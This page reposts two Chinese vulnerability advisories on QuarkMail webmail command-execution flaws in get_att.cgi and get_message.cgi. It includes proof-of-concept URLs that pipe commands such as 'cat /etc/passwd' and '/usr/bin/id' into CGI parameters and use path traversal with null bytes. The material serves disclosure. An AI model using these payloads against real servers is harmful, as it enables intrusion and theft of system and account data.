您的位置:首页 > 大数据 > 人工智能

QuarkMail get_att.cgi 命令执行漏洞

2013-07-31 14:49 267 查看
漏洞类型:
命令执行漏洞

网站组件:
QuarkMail

漏洞描述:

QuarkMail是国内一款非常流行的邮件系统,其存在命令执行漏洞,攻击者可以利用该漏洞,执行恶意系统命令。

快客电邮在访问“ http://mail.xxx.com/cgi-bin/web2cgi/get_att.cgi?up_attach=|cat%20/etc/passwd ”这样的地址时,get_att.cgi没有过滤好,导致命令执行漏洞。

漏洞危害:

这个漏洞极易被攻击者利用,会导致网站数据库中的敏感数据被窃取,严重危害网站商业数据、用户信息的安全。



图:漏洞证明

解决方案:
1、请访问其官方网站,下载并更新至QuarkMail的最新版本:http://www.ipmotor.com/。

---------------------------------------------------------------------------------------------------------------------------------

2011-03-15

漏洞说明:快客电邮(QuarkMail)是北京雄智伟业科技公司推出的电子邮件系统,被广泛用于各个领域的电子邮件解决方案,其webmail部分使用perl cgi编写,但是80sec在其系统中发现一个重大的安全漏洞,导致远程用户可以在邮件系统上以当前进程身份执行任意命令,从而进一步控制主机或者系统。

  漏洞厂商:http://www.ipmotor.com/

  漏洞解析:QuarkMail错误地使用perl的open函数以打开文件,实现模板等功能,但是其对用户传入的参数没有做有效的过滤,从而导致一个命令执行漏洞。

  漏洞证明:登录进入系统之后访问如下URL

  http://mail.80sec.com.foo/cgi-bin/get_message.cgi?sk=tERZ6WI1&fd=inbox&p=1&l=10&max=2&lang=gb&tf=../../../../../../../etc/passwd%00&id=2&sort=0&read_flag=yes

  即可得到系统账户文件,访问如下URL

  http://mail.80sec.com.foo/cgi-bin/get_message.cgi?sk=tERZ6WI1&fd=inbox&p=1&l=10&max=2&lang=gb&tf=../../../../../../../usr/bin/id|%00&id=2&sort=0&read_flag=yes

  即可以将/usr/bin/id文件打开执行,并且将结果返回,用户就可以利用一序列操作获得系统的完整访问权。
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: